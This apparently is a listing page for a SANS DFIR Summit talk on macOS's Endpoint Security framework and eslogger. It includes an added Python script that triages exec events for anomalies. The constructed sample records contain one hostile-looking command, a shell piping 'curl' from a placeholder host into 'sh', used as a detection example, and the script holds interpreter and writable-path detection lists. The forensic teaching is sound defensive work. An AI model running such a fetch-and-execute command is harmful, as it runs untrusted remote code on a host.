Overview
Explore the macOS Endpoint Security framework in this 30-minute conference talk presented at the SANS DFIR Summit 2025 by Jacob Latonis of Proofpoint and Julia Paluch of GreyNoise Intelligence. Learn how to use this framework, introduced in macOS 10.15 Catalina and extended with each major OS release, as a source of evidence alongside traditional tools such as the Apple Unified Log in digital forensics and incident response investigations.
Discover how the Endpoint Security framework, consumed mainly by EDR products for detection, can also be used by DFIR practitioners to baseline a system and watch for anomalous activity on a machine that is actively compromised. Learn to use eslogger, Apple's built-in Endpoint Security client (shipped with macOS 13 Ventura and later; it must run as root from a terminal that has been granted Full Disk Access), to stream events as they fire on the system, and walk through examples of malware execution with the corresponding Endpoint Security records to see how those records serve as evidence.
Pick up filtering techniques for cutting through the volume of events so that threat hunting and investigation focus on what is relevant. Understand which process, file and other activity macOS records through this framework and how to correlate that data during an active compromise. Walk away with a clearer picture of macOS's evolving security capabilities and practical skills for adding the Endpoint Security framework to your DFIR toolkit when investigating live, potentially compromised systems.
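The following is an added example of the kind of filtering the talk describes, written for this page and not taken from the speakers' material or from Apple. It triages exec records in the newline-delimited JSON that eslogger prints, dropping baseline noise (signed platform binaries launched from normal paths) and surfacing a few classic anomalies: an unsigned binary, execution from a temp or user-writable directory, and a shell or interpreter launched with an inline command. The sample records are constructed, and the field layout (process.executable.path, process.signing_id, process.is_platform_binary, event.exec.target, event.exec.args) is assumed to match eslogger's JSON; check it against one real record before relying on it.

```python
"""Triage eslogger exec records: drop baseline noise, surface anomalies."""
import json
import sys

# Constructed NDJSON approximating `sudo eslogger exec` output (one JSON
# object per line). The field names are ASSUMED from eslogger's JSON; run
# `sudo eslogger exec | head -n 1` on a real Mac to confirm the layout.
SAMPLE_NDJSON = """\
{"event_type": 9, "time": "2025-07-01T12:00:00Z", "process": {"audit_token": {"pid": 400}, "ppid": 1, "executable": {"path": "/usr/bin/login"}, "signing_id": "com.apple.login", "is_platform_binary": true}, "event": {"exec": {"target": {"audit_token": {"pid": 501}, "ppid": 400, "executable": {"path": "/bin/zsh"}, "signing_id": "com.apple.zsh", "is_platform_binary": true}, "args": ["-zsh", "-l"]}}}
{"event_type": 9, "time": "2025-07-01T12:00:05Z", "process": {"audit_token": {"pid": 501}, "ppid": 400, "executable": {"path": "/bin/zsh"}, "signing_id": "com.apple.zsh", "is_platform_binary": true}, "event": {"exec": {"target": {"audit_token": {"pid": 510}, "ppid": 501, "executable": {"path": "/usr/bin/git"}, "signing_id": "com.apple.git", "is_platform_binary": true}, "args": ["git", "status"]}}}
{"event_type": 9, "time": "2025-07-01T12:00:09Z", "process": {"audit_token": {"pid": 520}, "ppid": 1, "executable": {"path": "/Applications/Tool.app/Contents/MacOS/Tool"}, "signing_id": "com.example.tool", "team_id": "ABCDE12345", "is_platform_binary": false}, "event": {"exec": {"target": {"audit_token": {"pid": 521}, "ppid": 520, "executable": {"path": "/Applications/Tool.app/Contents/MacOS/helper"}, "signing_id": "com.example.tool.helper", "team_id": "ABCDE12345", "is_platform_binary": false}, "args": ["helper", "--check"]}}}
{"event_type": 9, "time": "2025-07-01T12:01:00Z", "process": {"audit_token": {"pid": 501}, "ppid": 400, "executable": {"path": "/bin/zsh"}, "signing_id": "com.apple.zsh", "is_platform_binary": true}, "event": {"exec": {"target": {"audit_token": {"pid": 777}, "ppid": 501, "executable": {"path": "/private/tmp/.update"}, "signing_id": "", "is_platform_binary": false}, "args": ["/private/tmp/.update"]}}}
{"event_type": 9, "time": "2025-07-01T12:01:02Z", "process": {"audit_token": {"pid": 777}, "ppid": 501, "executable": {"path": "/private/tmp/.update"}, "signing_id": "", "is_platform_binary": false}, "event": {"exec": {"target": {"audit_token": {"pid": 778}, "ppid": 777, "executable": {"path": "/bin/sh"}, "signing_id": "com.apple.sh", "is_platform_binary": true}, "args": ["sh", "-c", "curl -fsSL http://example.invalid/p | sh"]}}}
"""

# Heuristics chosen for this example; tune them to the host's baseline.
WRITABLE_PREFIXES = ("/private/tmp/", "/tmp/", "/var/folders/", "/Users/Shared/")
INLINE_INTERPRETERS = {"/bin/sh", "/bin/bash", "/bin/zsh",
                       "/usr/bin/osascript", "/usr/bin/python3"}


def _path(proc):
    """Executable path of an es_process-style object, or '' if absent."""
    return proc.get("executable", {}).get("path", "")


def _pid(proc):
    """PID carried in the process's audit token."""
    return proc.get("audit_token", {}).get("pid")


def reasons_for(record):
    """Return the anomaly reasons for one exec record ([] means baseline noise)."""
    exec_ev = record.get("event", {}).get("exec")
    if exec_ev is None:          # not an exec event (fork, open, ...): ignore here
        return []
    parent, target = record.get("process", {}), exec_ev.get("target", {})
    tpath, ppath = _path(target), _path(parent)
    reasons = []
    if not target.get("is_platform_binary") and not target.get("signing_id"):
        reasons.append("target is unsigned")
    if tpath.startswith(WRITABLE_PREFIXES):
        reasons.append("target runs from a temp/user-writable path")
    if ppath.startswith(WRITABLE_PREFIXES):
        reasons.append("parent runs from a temp/user-writable path")
    args = exec_ev.get("args", [])
    # argv[0] is the program name; look for -c / -e among the real arguments
    if tpath in INLINE_INTERPRETERS and any(a in ("-c", "-e") for a in args[1:]):
        reasons.append("interpreter launched with an inline command")
    return reasons


def triage(ndjson_text):
    """Parse NDJSON and return one summary dict per anomalous exec, in order."""
    hits = []
    for line in ndjson_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        why = reasons_for(rec)
        if not why:
            continue                      # baseline noise: drop it
        exec_ev = rec["event"]["exec"]
        hits.append({
            "time": rec.get("time"),
            "parent_pid": _pid(rec["process"]),
            "parent": _path(rec["process"]),
            "pid": _pid(exec_ev["target"]),
            "target": _path(exec_ev["target"]),
            "args": exec_ev.get("args", []),
            "reasons": why,
        })
    return hits


if __name__ == "__main__":
    # Pipe live output in (`sudo eslogger exec | python3 triage.py`) or run
    # with no stdin to triage the constructed sample.
    source = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_NDJSON
    for hit in triage(source):
        print(json.dumps(hit))
```

On the constructed sample, the first three records (login spawning zsh, zsh spawning git, a Developer ID-signed app spawning its own helper) are dropped, and the two that remain are the unsigned binary executed from /private/tmp and the `sh -c "curl ... | sh"` it then launches. That parent-to-child chain is exactly the kind of lineage worth pivoting on when baselining a live system.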
Syllabus
macOS Endpoint Security Framework
Taught by
SANS Digital Forensics and Incident Response